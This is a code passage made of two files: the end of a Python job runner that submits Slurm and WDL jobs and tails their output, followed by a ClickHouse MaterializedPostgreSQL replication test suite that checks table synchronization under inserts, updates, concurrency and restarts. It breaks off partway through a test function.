state = self._check_batch_job(check, slurm_jobid) if state == "Running": self.logger.log("Running") elif state == "Pending": self.logger.log("Pending") elif state == "Finished": cont = False self.logger.log("Finished") else: if retry > self._MAX_RETRY: cont = False retry += 1 self.logger.log("Unknown") if os.path.exists(outfile): cont = False sleep(self._BATCH_POLL) # Tail output rlist = [] stdout = None stderr = None if os.path.exists(outfile): stdout = open(outfile) rlist.append(stdout) else: self.logger.error("No output file generated") if os.path.exists(errfile): stderr = open(errfile) rlist.append(stderr) else: self.logger.error("No error file generated") cont = True if len(rlist) == 0: cont = False next_check = 0 while cont: if time() > next_check: state = self._check_batch_job(check, slurm_jobid) next_check = time() + self._BATCH_POLL if state != "Running": cont = False r, w, e = select(rlist, [], [], 10) for f in r: for line in f: if f == stdout and self.logger: self.logger.log(line) elif f == stderr and self.logger: self.logger.error(line) sleep(self._FILE_POLL) # TODO: Extract real exit code resp = {"exit_status": 0, "output_file": outfile, "error_file": errfile} result = {"result": [resp]} for q in queues: q.put(["finished_special", job_id, result]) def _batch_submit(self, stype, config, data, job_id, fin_q): """ This subbmits the job to the batch system and starts a thread to monitor the progress. The assumptions are there is a submit script and the batch system will return a job id and log output to a specified file. """ params = data["params"][0] submit = "%s_submit" % (stype) if "submit_script" not in params: raise ValueError("Missing submit script") os.chdir(self.shareddir) scr = params["submit_script"] if not os.path.exists(scr): raise OSError("Submit script not found at %s" % (scr)) outfile = "%s.out" % (job_id) errfile = "%s.err" % (job_id) cmd = [submit, scr, outfile, errfile] proc = Popen(cmd, stdout=PIPE, stderr=PIPE) stdout, stderr = proc.communicate() slurm_jobid = stdout.decode("utf-8").rstrip() out = Thread( target=self._watch_batch, args=[stype, job_id, slurm_jobid, outfile, errfile, fin_q], ) self.threads.append(out) out.start() self.containers.append(proc) return proc def _readio(self, p, job_id, queues): cont = True last = False while cont: rlist = [p.stdout, p.stderr] x = select(rlist, [], [], 1)[0] for f in x: if f == p.stderr: error = 1 else: error = 0 lines = [] for line in f.read().decode("utf-8").split("\n"): lines.append({"line": line, "is_error": error}) if len(lines) > 0: self.logger.log_lines(lines) if last: cont = False if p.poll() is not None: last = True resp = {"exit_status": p.returncode, "output_file": None, "error_file": None} result = {"result": [resp]} p.wait() for q in queues: q.put(["finished_special", job_id, result]) def _wdl_run(self, stype, config, data, job_id, queues): """ This subbmits the job to the batch system and starts a thread to monitor the progress. """ params = data["params"][0] if "workflow" not in params: raise ValueError("Missing workflow script") if "inputs" not in params: raise ValueError("Missing inputs") os.chdir(self.shareddir) wdl = params["workflow"] if not os.path.exists(wdl): raise OSError("Workflow script not found at %s" % (wdl)) inputs = params["inputs"] if not os.path.exists(inputs): raise OSError("Inputs file not found at %s" % (inputs)) cmd = ["wdl_run", inputs, wdl] proc = Popen(cmd, bufsize=0, stdout=PIPE, stderr=PIPE) out = Thread(target=self._readio, args=[proc, job_id, queues]) self.threads.append(out) out.start() self.containers.append(proc) return proc
test.py
import pytest import time import psycopg2 import os.path as p import random from helpers.cluster import ClickHouseCluster from helpers.test_tools import assert_eq_with_retry from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT from helpers.test_tools import TSV from random import randrange import threading cluster = ClickHouseCluster(__file__) instance = cluster.add_instance('instance', main_configs = ['configs/log_conf.xml'], user_configs = ['configs/users.xml'], with_postgres=True, stay_alive=True) postgres_table_template = """ CREATE TABLE IF NOT EXISTS "{}" ( key Integer NOT NULL, value Integer, PRIMARY KEY(key)) """ postgres_table_template_2 = """ CREATE TABLE IF NOT EXISTS "{}" ( key Integer NOT NULL, value1 Integer, value2 Integer, value3 Integer, PRIMARY KEY(key)) """ postgres_table_template_3 = """ CREATE TABLE IF NOT EXISTS "{}" ( key1 Integer NOT NULL, value1 Integer, key2 Integer NOT NULL, value2 Integer NOT NULL) """ def get_postgres_conn(ip, port, database=False, auto_commit=True, database_name='postgres_database', replication=False): if database == True: conn_string = "host={} port={} dbname='{}' user='postgres' password='mysecretpassword'".format(ip, port, database_name) else: conn_string = "host={} port={} user='postgres' password='mysecretpassword'".format(ip, port) if replication: conn_string += " replication='database'" conn = psycopg2.connect(conn_string) if auto_commit: conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT) conn.autocommit = True return conn def create_replication_slot(conn, slot_name='user_slot'): cursor = conn.cursor() cursor.execute('CREATE_REPLICATION_SLOT {} LOGICAL pgoutput EXPORT_SNAPSHOT'.format(slot_name)) result = cursor.fetchall() print(result[0][0]) # slot name print(result[0][1]) # start lsn print(result[0][2]) # snapshot return result[0][2] def drop_replication_slot(conn, slot_name='user_slot'): cursor = conn.cursor() cursor.execute("select pg_drop_replication_slot('{}')".format(slot_name)) def create_postgres_db(cursor, name='postgres_database'): cursor.execute("CREATE DATABASE {}".format(name)) def drop_postgres_db(cursor, name='postgres_database'): cursor.execute("DROP DATABASE IF EXISTS {}".format(name)) def create_clickhouse_postgres_db(ip, port, name='postgres_database'): instance.query(''' CREATE DATABASE {} ENGINE = PostgreSQL('{}:{}', '{}', 'postgres', 'mysecretpassword')'''.format(name, ip, port, name)) def drop_clickhouse_postgres_db(name='postgres_database'): instance.query('DROP DATABASE {}'.format(name)) def create_materialized_db(ip, port, materialized_database='test_database', postgres_database='postgres_database', settings=[]): create_query = "CREATE DATABASE {} ENGINE = MaterializedPostgreSQL('{}:{}', '{}', 'postgres', 'mysecretpassword')".format(materialized_database, ip, port, postgres_database) if len(settings) > 0: create_query += " SETTINGS " for i in range(len(settings)): if i != 0: create_query += ', ' create_query += settings[i] instance.query(create_query) assert materialized_database in instance.query('SHOW DATABASES') def drop_materialized_db(materialized_database='test_database'): instance.query('DROP DATABASE IF EXISTS {}'.format(materialized_database)) assert materialized_database not in instance.query('SHOW DATABASES') def drop_postgres_table(cursor, table_name): cursor.execute("""DROP TABLE IF EXISTS "{}" """.format(table_name)) def create_postgres_table(cursor, table_name, replica_identity_full=False, template=postgres_table_template): drop_postgres_table(cursor, table_name) cursor.execute(template.format(table_name)) if replica_identity_full: cursor.execute('ALTER TABLE {} REPLICA IDENTITY FULL;'.format(table_name)) queries = [ 'INSERT INTO postgresql_replica_{} select i, i from generate_series(0, 10000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE (value*value) % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value - 125 WHERE key % 2 = 0;', "UPDATE postgresql_replica_{} SET key=key+20000 WHERE key%2=0", 'INSERT INTO postgresql_replica_{} select i, i from generate_series(40000, 50000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE key % 10 = 0;', 'UPDATE postgresql_replica_{} SET value = value + 101 WHERE key % 2 = 1;', "UPDATE postgresql_replica_{} SET key=key+80000 WHERE key%2=1", 'DELETE FROM postgresql_replica_{} WHERE value % 2 = 0;', 'UPDATE postgresql_replica_{} SET value = value + 2000 WHERE key % 5 = 0;', 'INSERT INTO postgresql_replica_{} select i, i from generate_series(200000, 250000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE value % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value * 2 WHERE key % 3 = 0;', "UPDATE postgresql_replica_{} SET key=key+500000 WHERE key%2=1", 'INSERT INTO postgresql_replica_{} select i, i from generate_series(1000000, 1050000) as t(i);', 'DELETE FROM postgresql_replica_{} WHERE value % 9 = 2;', "UPDATE postgresql_replica_{} SET key=key+10000000", 'UPDATE postgresql_replica_{} SET value = value + 2 WHERE key % 3 = 1;', 'DELETE FROM postgresql_replica_{} WHERE value%5 = 0;' ] def assert_nested_table_is_created(table_name, materialized_database='test_database'): database_tables = instance.query('SHOW TABLES FROM {}'.format(materialized_database)) while table_name not in database_tables: time.sleep(0.2) database_tables = instance.query('SHOW TABLES FROM {}'.format(materialized_database)) assert(table_name in database_tables) @pytest.mark.timeout(320) def check_tables_are_synchronized(table_name, order_by='key', postgres_database='postgres_database', materialized_database='test_database'): assert_nested_table_is_created(table_name, materialized_database) expected = instance.query('select * from {}.{} order by {};'.format(postgres_database, table_name, order_by)) result = instance.query('select * from {}.{} order by {};'.format(materialized_database, table_name, order_by)) while result != expected: time.sleep(0.5) result = instance.query('select * from {}.{} order by {};'.format(materialized_database, table_name, order_by)) assert(result == expected) @pytest.fixture(scope="module") def started_cluster(): try: cluster.start() conn = get_postgres_conn(ip=cluster.postgres_ip, port=cluster.postgres_port) cursor = conn.cursor() create_postgres_db(cursor, 'postgres_database') create_clickhouse_postgres_db(ip=cluster.postgres_ip, port=cluster.postgres_port) instance.query("DROP DATABASE IF EXISTS test_database") yield cluster finally: cluster.shutdown() def test_load_and_sync_all_database_tables(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursor, table_name); instance.query("INSERT INTO postgres_database.{} SELECT number, number from numbers(50)".format(table_name)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) assert 'test_database' in instance.query('SHOW DATABASES') for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); cursor.execute('drop table {};'.format(table_name)) result = instance.query('''SELECT count() FROM system.tables WHERE database = 'test_database';''') assert(int(result) == NUM_TABLES) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_replicating_dml(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(50)".format(i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(NUM_TABLES): instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 50 + number, {} from numbers(1000)".format(i, i)) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); for i in range(NUM_TABLES): cursor.execute('UPDATE postgresql_replica_{} SET value = {} * {} WHERE key < 50;'.format(i, i, i)) cursor.execute('UPDATE postgresql_replica_{} SET value = {} * {} * {} WHERE key >= 50;'.format(i, i, i, i)) for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): cursor.execute('DELETE FROM postgresql_replica_{} WHERE (value*value + {}) % 2 = 0;'.format(i, i)) cursor.execute('UPDATE postgresql_replica_{} SET value = value - (value % 7) WHERE key > 128 AND key < 512;'.format(i)) cursor.execute('DELETE FROM postgresql_replica_{} WHERE key % 7 = 1;'.format(i, i)) for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) drop_materialized_db() def test_different_data_types(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() cursor.execute('drop table if exists test_data_types;') cursor.execute('drop table if exists test_array_data_type;') cursor.execute( '''CREATE TABLE test_data_types ( id integer PRIMARY KEY, a smallint, b integer, c bigint, d real, e double precision, f serial, g bigserial, h timestamp, i date, j decimal(5, 5), k numeric(5, 5))''') cursor.execute( '''CREATE TABLE test_array_data_type ( key Integer NOT NULL PRIMARY KEY, a Date[] NOT NULL, -- Date b Timestamp[] NOT NULL, -- DateTime64(6) c real[][] NOT NULL, -- Float32 d double precision[][] NOT NULL, -- Float64 e decimal(5, 5)[][][] NOT NULL, -- Decimal32 f integer[][][] NOT NULL, -- Int32 g Text[][][][][] NOT NULL, -- String h Integer[][][], -- Nullable(Int32) i Char(2)[][][][], -- Nullable(String) k Char(2)[] -- Nullable(String) )''') create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for i in range(10): instance.query(''' INSERT INTO postgres_database.test_data_types VALUES ({}, -32768, -2147483648, -9223372036854775808, 1.12345, 1.1234567890, 2147483647, 9223372036854775807, '2000-05-12 12:12:12.012345', '2000-05-12', 0.2, 0.2)'''.format(i)) check_tables_are_synchronized('test_data_types', 'id'); result = instance.query('SELECT * FROM test_database.test_data_types ORDER BY id LIMIT 1;') assert(result == '0\t-32768\t-2147483648\t-9223372036854775808\t1.12345\t1.123456789\t2147483647\t9223372036854775807\t2000-05-12 12:12:12.012345\t2000-05-12\t0.2\t0.2\n') for i in range(10): col = random.choice(['a', 'b', 'c']) cursor.execute('UPDATE test_data_types SET {} = {};'.format(col, i)) cursor.execute('''UPDATE test_data_types SET i = '2020-12-12';'''.format(col, i)) check_tables_are_synchronized('test_data_types', 'id'); instance.query("INSERT INTO postgres_database.test_array_data_type " "VALUES (" "0, " "['2000-05-12', '2000-05-12'], " "['2000-05-12 12:12:12.012345', '2000-05-12 12:12:12.012345'], " "[[1.12345], [1.12345], [1.12345]], " "[[1.1234567891], [1.1234567891], [1.1234567891]], " "[[[0.11111, 0.11111]], [[0.22222, 0.22222]], [[0.33333, 0.33333]]], " "[[[1, 1], [1, 1]], [[3, 3], [3, 3]], [[4, 4], [5, 5]]], " "[[[[['winx', 'winx', 'winx']]]]], " "[[[1, NULL], [NULL, 1]], [[NULL, NULL], [NULL, NULL]], [[4, 4], [5, 5]]], " "[[[[NULL]]]], " "[]" ")") expected = ( "0\t" + "['2000-05-12','2000-05-12']\t" + "['2000-05-12 12:12:12.012345','2000-05-12 12:12:12.012345']\t" + "[[1.12345],[1.12345],[1.12345]]\t" + "[[1.1234567891],[1.1234567891],[1.1234567891]]\t" + "[[[0.11111,0.11111]],[[0.22222,0.22222]],[[0.33333,0.33333]]]\t" "[[[1,1],[1,1]],[[3,3],[3,3]],[[4,4],[5,5]]]\t" "[[[[['winx','winx','winx']]]]]\t" "[[[1,NULL],[NULL,1]],[[NULL,NULL],[NULL,NULL]],[[4,4],[5,5]]]\t" "[[[[NULL]]]]\t" "[]\n" ) check_tables_are_synchronized('test_array_data_type'); result = instance.query('SELECT * FROM test_database.test_array_data_type ORDER BY key;') assert(result == expected) drop_materialized_db() cursor.execute('drop table if exists test_data_types;') cursor.execute('drop table if exists test_array_data_type;') def test_load_and_sync_subset_of_database_tables(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 10 publication_tables = '' for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, number from numbers(50)".format(i)) if i < int(NUM_TABLES/2): if publication_tables != '': publication_tables += ', ' publication_tables += table_name create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_tables_list = '{}'".format(publication_tables)]) assert 'test_database' in instance.query('SHOW DATABASES') time.sleep(1) for i in range(int(NUM_TABLES/2)): table_name = 'postgresql_replica_{}'.format(i) assert_nested_table_is_created(table_name) result = instance.query('''SELECT count() FROM system.tables WHERE database = 'test_database';''') assert(int(result) == int(NUM_TABLES/2)) database_tables = instance.query('SHOW TABLES FROM test_database') for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) if i < int(NUM_TABLES/2): assert table_name in database_tables else: assert table_name not in database_tables instance.query("INSERT INTO postgres_database.{} SELECT 50 + number, {} from numbers(100)".format(table_name, i)) for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) if i < int(NUM_TABLES/2): check_tables_are_synchronized(table_name); drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_changing_replica_identity_value(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica'); instance.query("INSERT INTO postgres_database.postgresql_replica SELECT 50 + number, number from numbers(50)") create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) instance.query("INSERT INTO postgres_database.postgresql_replica SELECT 100 + number, number from numbers(50)") check_tables_are_synchronized('postgresql_replica'); cursor.execute("UPDATE postgresql_replica SET key=key-25 WHERE key<100 ") check_tables_are_synchronized('postgresql_replica'); drop_materialized_db() cursor.execute('drop table if exists postgresql_replica;') def test_clickhouse_restart(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {} from numbers(50)".format(i, i)) instance.query("CREATE DATABASE test_database ENGINE = MaterializedPostgreSQL('postgres1:5432', 'postgres_database', 'postgres', 'mysecretpassword')") for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized(table_name); for i in range(NUM_TABLES): instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 50 + number, {} from numbers(50000)".format(i, i)) instance.restart_clickhouse() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_replica_identity_index(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica', template=postgres_table_template_3); cursor.execute("CREATE unique INDEX idx on postgresql_replica(key1, key2);") cursor.execute("ALTER TABLE postgresql_replica REPLICA IDENTITY USING INDEX idx") instance.query("INSERT INTO postgres_database.postgresql_replica SELECT number, number, number, number from numbers(50, 10)") create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) instance.query("INSERT INTO postgres_database.postgresql_replica SELECT number, number, number, number from numbers(100, 10)") check_tables_are_synchronized('postgresql_replica', order_by='key1'); cursor.execute("UPDATE postgresql_replica SET key1=key1-25 WHERE key1<100 ") cursor.execute("UPDATE postgresql_replica SET key2=key2-25 WHERE key2>100 ") cursor.execute("UPDATE postgresql_replica SET value1=value1+100 WHERE key1<100 ") cursor.execute("UPDATE postgresql_replica SET value2=value2+200 WHERE key2>100 ") check_tables_are_synchronized('postgresql_replica', order_by='key1'); cursor.execute('DELETE FROM postgresql_replica WHERE key2<75;') check_tables_are_synchronized('postgresql_replica', order_by='key1'); drop_materialized_db() cursor.execute('drop table if exists postgresql_replica;') def test_table_schema_changes(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i), template=postgres_table_template_2); instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT number, {}, {}, {} from numbers(25)".format(i, i, i, i)) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_allow_automatic_update = 1"]) for i in range(NUM_TABLES): instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 25 + number, {}, {}, {} from numbers(25)".format(i, i, i, i)) for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); expected = instance.query("SELECT key, value1, value3 FROM test_database.postgresql_replica_3 ORDER BY key"); altered_table = random.randint(0, 4) cursor.execute("ALTER TABLE postgresql_replica_{} DROP COLUMN value2".format(altered_table)) for i in range(NUM_TABLES): cursor.execute("INSERT INTO postgresql_replica_{} VALUES (50, {}, {})".format(i, i, i)) cursor.execute("UPDATE postgresql_replica_{} SET value3 = 12 WHERE key%2=0".format(i)) assert_nested_table_is_created('postgresql_replica_{}'.format(altered_table)) check_tables_are_synchronized('postgresql_replica_{}'.format(altered_table)) print('check1 OK') for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): if i != altered_table: instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 51 + number, {}, {}, {} from numbers(49)".format(i, i, i, i)) else: instance.query("INSERT INTO postgres_database.postgresql_replica_{} SELECT 51 + number, {}, {} from numbers(49)".format(i, i, i)) check_tables_are_synchronized('postgresql_replica_{}'.format(altered_table)); print('check2 OK') for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); for i in range(NUM_TABLES): cursor.execute('drop table postgresql_replica_{};'.format(i)) instance.query("DROP DATABASE test_database") for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_many_concurrent_queries(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 5 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); instance.query('INSERT INTO postgres_database.postgresql_replica_{} SELECT number, number from numbers(10000)'.format(i)) n = [10000] query_pool = ['DELETE FROM postgresql_replica_{} WHERE (value*value) % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value - 125 WHERE key % 2 = 0;', 'DELETE FROM postgresql_replica_{} WHERE key % 10 = 0;', 'UPDATE postgresql_replica_{} SET value = value*5 WHERE key % 2 = 1;', 'DELETE FROM postgresql_replica_{} WHERE value % 2 = 0;', 'UPDATE postgresql_replica_{} SET value = value + 2000 WHERE key % 5 = 0;', 'DELETE FROM postgresql_replica_{} WHERE value % 3 = 0;', 'UPDATE postgresql_replica_{} SET value = value * 2 WHERE key % 3 = 0;', 'DELETE FROM postgresql_replica_{} WHERE value % 9 = 2;', 'UPDATE postgresql_replica_{} SET value = value + 2 WHERE key % 3 = 1;', 'DELETE FROM postgresql_replica_{} WHERE value%5 = 0;'] def attack(thread_id): print('thread {}'.format(thread_id)) k = 10000 for i in range(20): query_id = random.randrange(0, len(query_pool)-1) table_id = random.randrange(0, 5) # num tables # random update / delete query cursor.execute(query_pool[query_id].format(table_id)) print("table {} query {} ok".format(table_id, query_id)) # allow some thread to do inserts (not to violate key constraints) if thread_id < 5: print("try insert table {}".format(thread_id)) instance.query('INSERT INTO postgres_database.postgresql_replica_{} SELECT {}*10000*({} + number), number from numbers(1000)'.format(i, thread_id, k)) k += 1 print("insert table {} ok".format(thread_id)) if i == 5: # also change primary key value print("try update primary key {}".format(thread_id)) cursor.execute("UPDATE postgresql_replica_{} SET key=key%100000+100000*{} WHERE key%{}=0".format(thread_id, i+1, i+1)) print("update primary key {} ok".format(thread_id)) threads = [] threads_num = 16 for i in range(threads_num): threads.append(threading.Thread(target=attack, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 1)) thread.start() n[0] = 50000 for table_id in range(NUM_TABLES): n[0] += 1 instance.query('INSERT INTO postgres_database.postgresql_replica_{} SELECT {} + number, number from numbers(5000)'.format(table_id, n[0])) #cursor.execute("UPDATE postgresql_replica_{} SET key=key%100000+100000*{} WHERE key%{}=0".format(table_id, table_id+1, table_id+1)) for thread in threads: thread.join() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); count1 = instance.query('SELECT count() FROM postgres_database.postgresql_replica_{}'.format(i)) count2 = instance.query('SELECT count() FROM (SELECT * FROM test_database.postgresql_replica_{})'.format(i)) assert(int(count1) == int(count2)) print(count1, count2) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_single_transaction(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica_0'); conn.commit() create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) assert_nested_table_is_created('postgresql_replica_0') for query in queries: print('query {}'.format(query)) cursor.execute(query.format(0)) time.sleep(5) result = instance.query("select count() from test_database.postgresql_replica_0") # no commit yet assert(int(result) == 0) conn.commit() check_tables_are_synchronized('postgresql_replica_0'); drop_materialized_db() cursor.execute('drop table if exists postgresql_replica_0;') def test_virtual_columns(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() create_postgres_table(cursor, 'postgresql_replica_0'); create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, settings=["materialized_postgresql_allow_automatic_update = 1"]) assert_nested_table_is_created('postgresql_replica_0') instance.query("INSERT INTO postgres_database.postgresql_replica_0 SELECT number, number from numbers(10)") check_tables_are_synchronized('postgresql_replica_0'); # just check that it works, no check with `expected` because _version is taken as LSN, which will be different each time. result = instance.query('SELECT key, value, _sign, _version FROM test_database.postgresql_replica_0;') print(result) cursor.execute("ALTER TABLE postgresql_replica_0 ADD COLUMN value2 integer") instance.query("INSERT INTO postgres_database.postgresql_replica_0 SELECT number, number, number from numbers(10, 10)") check_tables_are_synchronized('postgresql_replica_0'); result = instance.query('SELECT key, value, value2, _sign, _version FROM test_database.postgresql_replica_0;') print(result) instance.query("INSERT INTO postgres_database.postgresql_replica_0 SELECT number, number, number from numbers(20, 10)") check_tables_are_synchronized('postgresql_replica_0'); result = instance.query('SELECT key, value, value2, _sign, _version FROM test_database.postgresql_replica_0;') print(result) drop_materialized_db() cursor.execute('drop table if exists postgresql_replica_0;') def test_multiple_databases(started_cluster): drop_materialized_db('test_database_1') drop_materialized_db('test_database_2') NUM_TABLES = 5 conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=False) cursor = conn.cursor() create_postgres_db(cursor, 'postgres_database_1') create_postgres_db(cursor, 'postgres_database_2') conn1 = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, database_name='postgres_database_1') conn2 = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, database_name='postgres_database_2') cursor1 = conn1.cursor() cursor2 = conn2.cursor() create_clickhouse_postgres_db(cluster.postgres_ip, cluster.postgres_port, 'postgres_database_1') create_clickhouse_postgres_db(cluster.postgres_ip, cluster.postgres_port, 'postgres_database_2') cursors = [cursor1, cursor2] for cursor_id in range(len(cursors)): for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) create_postgres_table(cursors[cursor_id], table_name); instance.query("INSERT INTO postgres_database_{}.{} SELECT number, number from numbers(50)".format(cursor_id + 1, table_name)) print('database 1 tables: ', instance.query('''SELECT name FROM system.tables WHERE database = 'postgres_database_1';''')) print('database 2 tables: ', instance.query('''SELECT name FROM system.tables WHERE database = 'postgres_database_2';''')) create_materialized_db(started_cluster.postgres_ip, started_cluster.postgres_port, 'test_database_1', 'postgres_database_1') create_materialized_db(started_cluster.postgres_ip, started_cluster.postgres_port, 'test_database_2', 'postgres_database_2') cursors = [cursor1, cursor2] for cursor_id in range(len(cursors)): for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) instance.query("INSERT INTO postgres_database_{}.{} SELECT 50 + number, number from numbers(50)".format(cursor_id + 1, table_name)) for cursor_id in range(len(cursors)): for i in range(NUM_TABLES): table_name = 'postgresql_replica_{}'.format(i) check_tables_are_synchronized( table_name, 'key', 'postgres_database_{}'.format(cursor_id + 1), 'test_database_{}'.format(cursor_id + 1)); for i in range(NUM_TABLES): cursor1.execute('drop table if exists postgresql_replica_{};'.format(i)) for i in range(NUM_TABLES): cursor2.execute('drop table if exists postgresql_replica_{};'.format(i)) drop_clickhouse_postgres_db('postgres_database_1') drop_clickhouse_postgres_db('postgres_database_2') drop_materialized_db('test_database_1') drop_materialized_db('test_database_2') def test_concurrent_transactions(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 6 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); def transaction(thread_id): conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor_ = conn.cursor() for query in queries: cursor_.execute(query.format(thread_id)) print('thread {}, query {}'.format(thread_id, query)) conn.commit() threads = [] threads_num = 6 for i in range(threads_num): threads.append(threading.Thread(target=transaction, args=(i,))) create_materialized_db(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port) for thread in threads: time.sleep(random.uniform(0, 0.5)) thread.start() for thread in threads: thread.join() for i in range(NUM_TABLES): check_tables_are_synchronized('postgresql_replica_{}'.format(i)); count1 = instance.query('SELECT count() FROM postgres_database.postgresql_replica_{}'.format(i)) count2 = instance.query('SELECT count() FROM (SELECT * FROM test_database.postgresql_replica_{})'.format(i)) print(int(count1), int(count2), sep=' ') assert(int(count1) == int(count2)) drop_materialized_db() for i in range(NUM_TABLES): cursor.execute('drop table if exists postgresql_replica_{};'.format(i)) def test_abrupt_connection_loss_while_heavy_replication(started_cluster): drop_materialized_db() conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True) cursor = conn.cursor() NUM_TABLES = 6 for i in range(NUM_TABLES): create_postgres_table(cursor, 'postgresql_replica_{}'.format(i)); def transaction(thread_id): if thread_id % 2: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=True) else: conn = get_postgres_conn(ip=started_cluster.postgres_ip, port=started_cluster.postgres_port, database=True, auto_commit=False) cursor_ = conn.cursor() for query in queries: 